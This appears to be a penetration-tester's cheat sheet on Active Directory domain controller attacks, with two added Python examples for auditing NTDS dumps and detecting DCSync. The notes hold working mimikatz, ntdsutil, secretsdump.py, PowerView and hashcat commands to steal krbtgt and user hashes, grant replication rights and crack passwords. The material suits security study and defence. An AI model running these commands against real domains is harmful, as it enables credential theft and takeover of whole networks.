Domain Controller specific

TGT Dump

Dump the hash of the krbtgt account, which the domain controller uses to sign Kerberos tickets. With it an attacker can forge tickets and impersonate other users or gain access to other services and hosts. With mimikatz:

lsadump::dcsync /user:krbtgt
sekurlsa::krbtgt
lsadump::lsa /inject /name:krbtgt

NTDS Dump

NTDS (ntds.dit) is the encrypted Active Directory database; it stores the structure and objects of the domain, including the account password hashes.

To dump the stored hashes, extract the following files from the domain controller:

C:\Windows\NTDS\ntds.dit
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY

To copy them, run the following from an elevated PowerShell prompt on the DC (ntdsutil writes an Install From Media snapshot into the given folder):

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full <dump folder>' q q"

Extract the hashes offline with Impacket's secretsdump.py:

secretsdump.py -security <security file> -system <system file> -ntds <path to ntds.dit> LOCAL

Crack the hashes. Only the NT part of each hash is needed to recover the password: given a hash of the form AAAA:BBBB (LM:NT), the string to brute-force is BBBB, the part to the right of the colon.

john -format=NT -wordlist=<wordlist> <hashfile>
hashcat -m 1000 -a 0 --force --show --username <hashfile> <wordlist>   # rows in <hashfile> follow the format <user>:<hash>
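Added example, not part of the original notes: a small audit of an NTDS dump in secretsdump.py's output format. It isolates the NT part right of the colon as described above, then flags accounts with an empty password and accounts that share the same NT hash (password reuse), which is what a defender wants from a dump of their own domain. The sample lines and hash values are constructed.

```python
# Added example (not from the original notes): audit a secretsdump-style NTDS dump.
# Lines look like  <domain>\<user>:<rid>:<LM hash>:<NT hash>:::
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash (MD4 of UTF-16LE "") of the empty password

# Constructed sample output (fake hashes, fictional lab domain) in secretsdump.py format.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
lab.local\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
lab.local\\j.doe:1106:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""


def nt_part(lm_nt):
    """Given 'AAAA:BBBB' (LM:NT), return the NT part, i.e. the string right of the colon."""
    return lm_nt.split(":")[-1].lower()


def parse_dump(text):
    """Yield (user, rid, lm, nt) from secretsdump-style lines; skip banners and junk."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue                      # not a user:rid:lm:nt::: record
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(nt) != 32:
            continue                      # malformed hash field
        yield user, rid, lm, nt


def audit(text):
    """Return (accounts with an empty password, {nt_hash: [accounts sharing it]})."""
    empty, by_hash = [], defaultdict(list)
    for user, rid, lm, nt in parse_dump(text):
        if nt == EMPTY_NT:
            empty.append(user)
        if not user.endswith("$"):        # machine accounts have random passwords; skip
            by_hash[nt].append(user)
    reused = {h: users for h, users in by_hash.items() if len(users) > 1 and h != EMPTY_NT}
    return empty, reused


if __name__ == "__main__":
    empty_accounts, reused_hashes = audit(SAMPLE_DUMP)
    print("empty passwords:", empty_accounts)
    print("reused NT hashes:", reused_hashes)
```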

DC Sync

This attack requires a user holding the Replicating Directory Changes All and Replicating Directory Changes privileges. By default Local and Domain Administrators hold them.

Find users with the required privileges with PowerView:

Get-ObjectACL -DistinguishedName "dc=<domain>,dc=local" -ResolveGUIDs | ? {($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }

If the current user lacks the required permissions, run this command on the DC to grant them:

Add-ObjectAcl -TargetDistinguishedName "dc=<domain>,dc=local" -PrincipalSamAccountName <user>

Run on DC

lsadump::dcsync /user:krbtgt                    // krbtgt hash (Kerberos TGT key)
lsadump::dcsync /user:<user>                    // secrets of a single user
lsadump::dcsync /domain:htb.local /all /csv     // dump all users

Run remotely

secretsdump.py -just-dc <domain>/<DC user>@<DC IP>       // dump NTDS secrets (NTLM hashes and Kerberos keys)
secretsdump.py -just-dc-ntlm <domain>/<DC user>@<DC IP>  // NTLM hashes only
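Added example from the detection side, not part of the original notes: a DCSync asks the DC for exactly the replication rights listed above, and the DC records that request as Security event 4662 with the rights' GUIDs in the Properties field. Legitimate replication comes from domain controller machine accounts, so a request from any other principal is the alert. The event records below are constructed; the three replication-right GUIDs are the real schema values.

```python
# Added example (not from the original notes): flag DCSync-style replication
# requests in Windows Security event 4662 records.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}


def replication_rights(properties):
    """Names of the replication rights whose GUIDs appear in a 4662 Properties string."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_GUIDS.items() if guid in props]


def is_suspicious_dcsync(event, dc_accounts):
    """True if a 4662 event requests replication rights from a principal that is not a DC."""
    if event.get("EventID") != 4662:
        return False
    if not replication_rights(event.get("Properties", "")):
        return False
    known_dcs = {a.upper() for a in dc_accounts}      # DC machine accounts, e.g. DC01$
    return event.get("SubjectUserName", "").upper() not in known_dcs


def find_dcsync(events, dc_accounts):
    """Return (SubjectUserName, rights) for every suspicious replication request."""
    return [(e["SubjectUserName"], replication_rights(e["Properties"]))
            for e in events if is_suspicious_dcsync(e, dc_accounts)]


# Constructed sample 4662 records (fields as logged by the DC; names and values made up).
DOMAIN_DNS = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"   # domainDNS object class
SAMPLE_EVENTS = [
    # normal replication between two DCs
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_DNS},
    # a user account asking for both replication rights: DCSync pattern
    {"EventID": 4662, "SubjectUserName": "j.doe", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_DNS},
    # ordinary property read by the same user: not replication
    {"EventID": 4662, "SubjectUserName": "j.doe", "AccessMask": "0x10",
     "Properties": "%%7684\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for user, rights in find_dcsync(SAMPLE_EVENTS, ["DC01$", "DC02$"]):
        print(f"ALERT: {user} requested {', '.join(rights)}")
```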